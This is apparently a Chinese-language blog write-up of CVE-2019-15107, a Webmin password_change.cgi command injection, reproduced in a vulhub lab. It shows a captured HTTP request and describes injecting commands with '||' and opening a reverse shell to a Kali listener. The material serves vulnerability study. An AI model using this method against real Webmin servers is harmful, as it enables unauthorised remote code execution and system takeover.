Webmin 远程命令执行漏洞(CVE-2019-15107)
1.webmin简介
1.1 什么是webmin
Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作
http://www.webmin.com/
Webmin 是一个用 Perl 编写的基于浏览器的管理应用程序。
是一个基于Web的界面,用于Unix的系统管理。使用任何支持表和表单的浏览器,可以设置用户帐户,Apache,DNS,文件共享等。
1.2 为什么用webmin
Linux系统因其高效稳定而受到广大用户的推崇与青睐,然后其管理有一定复杂性和学习周期。为了降低 Linux系统的管理难度,有时候会对公司内的Linux主机或VPS系统预装了网页管理工具webmin.
2. 漏洞概述
1.漏洞编号:CVE-2019-15107
2.漏洞描述:该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码
该漏洞由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞,该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码
3、受影响的版本:Webmin<=1.920
4,漏洞利用条件:版本满足要求,且服务器的配置文件允许修改密码时,在不知道webmin的用户和密码条件下,可以任意执行代码。
3.漏洞复现
3.1 环境搭建
环境:webmin 1.910
使用docker搭建,在vulhub项目中有webmin漏洞复现的环境
https://192.168.44.144:10000
首先进入容器,修改root用户密码
再次登录
漏洞需要开启密码重置功能。
在控制界面 https://ip:10000/webmin/edit_session.cgi?xnavigation=1
在服务器上查看webmin的配置文件
cat /etc/webmin/miniserv.conf
3.2.EXP
抓包获得改密码的请求包
POST /password_change.cgi HTTP/1.1
Host: 192.168.44.144:10000
Connection: close
Content-Length: 52
Cache-Control: max-age=0
Origin: https://192.168.44.144:10000
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Sec-Fetch-Site: same-origin
Referer: https://192.168.44.144:10000/session_login.cgi
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: redirect=1; testing=1; sessiontest=1; sid=xuser=root&pam=1&expired=2&old=123456&new1=11&new2=11
尝试利用 ||
执行命令
思考之后,考虑有可能root是系统用户,而不是webmin的用户
尝试随便写一个用户和密码
尝试执行反弹shell命令
①kali监听9000端口
②用burp suite ,对命令编码后执行
③kali收到shell
Webmin 远程命令执行漏洞(CVE-2019-15107)相关推荐
- webmin远程命令执行漏洞(cve-2019-15107)深入分析
漏洞描述 近日Webmin被发现存在一处远程命令执行漏洞,经过分析后,初步猜测其为一次后门植入事件. Webmin是目前功能最强大的基于Web的Unix系统管理工具.管理员通过浏览器访问Webmin的 ...
- CVE-2019-15107 Webmin远程命令执行漏洞复现
0X1 漏洞概述 Webmin的是一个用于管理类Unix的系统的管理配置工具,具有网络页面.在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令.它已知在端口1 ...
- flexpaper php 代码,FlexPaper 2.3.6 远程命令执行漏洞 附Exp
影响版本:小于FlexPaper 2.3.6的所有版本 FlexPaper (https://www.flowpaper.com) 是一个开源项目,遵循GPL协议,在互联网上非常流行.它为web客户端 ...
- 【注意】关于Redis存在远程命令执行漏洞的安全公告
点击蓝色"程序猿DD"关注我 回复"资源"获取独家整理的学习资料! 来源:CNVD漏洞平台 安全公告编号:CNTA-2019-0024 2019年7月10日,国 ...
- rmi远程反序列化rce漏洞_Oracle WebLogic 反序列化远程命令执行漏洞预警
报告编号:B6-2019-041901 报告来源:360-CERT 报告作者:360-CERT 更新日期:2019-04-19 0x00 事件背景 2019年4月17日,国家信息安全漏洞共享平台(CN ...
- 远程执行漏洞修复方案_请马上修复!SaltStack远程命令执行漏洞
[漏洞预警]SaltStack远程命令执行漏洞(CVE-2020-11651.CVE-2020-11652) 2020年5月3日,阿里云应急响应中心监测到近日国外某安全团队披露了SaltStack存在 ...
- 详述WebLogic反序列化远程命令执行漏洞的处理过程,云和恩墨技术通讯精选
各位亲爱的用户/读者朋友们: 为了及时共享行业案例,通告共性问题,达成知识共享和提前预防,我们整理和编辑了<云和恩墨技术通讯>(5月刊),通过对过去一段时间的知识回顾和故障归纳,以期提供有 ...
- CVE-2019-19781 Citrix ADCNetScaler远程命令执行漏洞
未经允许,不得擅自转载,违者必究 一.前言 @Adminxe 因为最近在刷edusrc,由此发现这个漏洞,涉及多所高校,所以过来给大家实战POC测试一波,可直接进行命令执行,Citrix产品中的漏洞使 ...
- 邮件传输代理Exim远程命令执行漏洞细节披露,影响全球近一半邮件服务器
注意:是远程命令执行,不是远程代码执行 Exim是一个MTA(Mail Transfer Agent,邮件传输代理)服务器软件,该软件基于GPL协议开发,是一款开源软件.该软件主要运行于类UNIX系统 ...
- 【知道创宇404实验室】Oracle WebLogic远程命令执行漏洞预警
2019年04月17日,国家信息安全漏洞共享平台(CNVD)官方发布安全公告 http://www.cnvd.org.cn/webinfo/show/4989 称Oracle WebLogic wls ...
最新文章
- 面向组合子程序设计方法 之 新约
- redis探秘:选择合适的数据结构,减少80%的内存占用,这些点你get到了吗?
- vue 分模块打包 脚手架_Vue面试官最爱的底层源码问题,你可以这样回答!
- linux多点触控软件测试,测试工程师日常工作中高频Linux命令
- gridview获取选中行数据_Word转Excel,不想熬夜加班,那就掌握这个数据清洗方法...
- ASP.NET备份恢复SqlServer数据库
- Andorid 系统性能优化---(22)Android性能相关常用命令收集
- 无法打开包括文件:“afxcontrolbars.h”
- getHandel redis_Controller层利用Redis实现分布式锁(注解实现)
- matlab聚合矩阵,c#和ILNumerics与Matlab中最有效的矩阵聚合方式
- ubuntu终端颜色配置
- xShell 5外观(背景、文字等)设置方案
- win7登录密码破解
- php数据库操作类库doctrine使用全攻略
- Linux系统网络环境配置(初学者必看)!!
- mac mini mysql 安装_苹果宣布新款Mac mini机型 高端版安装服务器系统
- C语言入门(前期准备工作)——超级详细的建议和教学,带你顺利跨越编程门槛
- 2019年定义区块链领域的7个法律问题(下篇)
- 热经-北京中地时空数码科技有限公司-研发工程师(WEBGIS方向)
- U V风和真实风向风速